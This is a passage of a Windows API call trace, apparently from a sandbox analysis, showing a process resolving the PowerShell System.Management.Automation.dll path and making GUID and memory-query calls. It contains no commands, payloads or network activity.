	[0040.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.329] GetLastError () returned 0x0
	[0040.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.329] GetLastError () returned 0x0
	[0040.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.329] GetLastError () returned 0x0
	[0040.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.329] GetLastError () returned 0x0
	[0040.329] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x533dc62c, Data2=0x4425, Data3=0x473c, Data4=([0]=0x91, [1]=0xa6, [2]=0x4a, [3]=0xbe, [4]=0x5d, [5]=0xff, [6]=0xc1, [7]=0xa7))) returned 0x0
	[0040.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.330] GetLastError () returned 0x0
	[0040.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.330] GetLastError () returned 0x0
	[0040.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.330] GetLastError () returned 0x0
	[0040.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.330] GetLastError () returned 0x0
	[0040.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.330] GetLastError () returned 0x0
	[0040.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.330] GetLastError () returned 0x0
	[0040.330] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x935b1e9f, Data2=0x7b91, Data3=0x4886, Data4=([0]=0x90, [1]=0xfd, [2]=0x8a, [3]=0x78, [4]=0x1e, [5]=0x87, [6]=0x6, [7]=0xfa))) returned 0x0
	[0040.330] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1445439c, Data2=0xf533, Data3=0x412f, Data4=([0]=0x83, [1]=0x78, [2]=0xee, [3]=0x2b, [4]=0x65, [5]=0x74, [6]=0x9a, [7]=0x4f))) returned 0x0
	[0040.330] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x68ea10fd, Data2=0x1613, Data3=0x4d88, Data4=([0]=0x88, [1]=0x76, [2]=0x41, [3]=0x38, [4]=0xd1, [5]=0x94, [6]=0x18, [7]=0x2a))) returned 0x0
	[0040.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.331] GetLastError () returned 0x0
	[0040.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.331] GetLastError () returned 0x0
	[0040.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.331] GetLastError () returned 0x0
	[0040.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.331] GetLastError () returned 0x0
	[0040.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.331] GetLastError () returned 0x0
	[0040.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.331] GetLastError () returned 0x0
	[0040.331] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x9c793073, Data2=0x1a8c, Data3=0x41a1, Data4=([0]=0x8d, [1]=0x35, [2]=0xef, [3]=0xc5, [4]=0x34, [5]=0xaa, [6]=0x18, [7]=0xfb))) returned 0x0
	[0040.332] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.332] GetLastError () returned 0x0
	[0040.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.332] GetLastError () returned 0x0
	[0040.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.332] GetLastError () returned 0x0
	[0040.332] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.332] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.332] GetLastError () returned 0x0
	[0040.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.332] GetLastError () returned 0x0
	[0040.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.332] GetLastError () returned 0x0
	[0040.333] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.333] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.333] GetLastError () returned 0x0
	[0040.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.333] GetLastError () returned 0x0
	[0040.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.333] GetLastError () returned 0x0
	[0040.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.333] GetLastError () returned 0x0
	[0040.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.333] GetLastError () returned 0x0
	[0040.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.333] GetLastError () returned 0x0
	[0040.333] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.334] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.334] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.334] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.335] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.335] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.335] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.336] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.336] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.336] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.336] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.337] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.337] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.337] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.337] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.338] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1fe9c8da, Data2=0xe9de, Data3=0x47d4, Data4=([0]=0xb3, [1]=0x60, [2]=0x62, [3]=0x87, [4]=0xac, [5]=0xa9, [6]=0x41, [7]=0xb1))) returned 0x0
	[0040.338] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.338] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.338] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.339] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.339] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.339] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.339] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.340] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.340] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.340] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.340] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.341] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.341] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.341] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.341] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.342] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.342] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.342] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.343] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.343] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.343] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1930f01c, Data2=0x3814, Data3=0x4339, Data4=([0]=0xbc, [1]=0x5e, [2]=0xa2, [3]=0x41, [4]=0x6f, [5]=0xbf, [6]=0xbe, [7]=0x22))) returned 0x0
	[0040.343] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.344] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.344] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.344] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.344] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.345] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.345] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
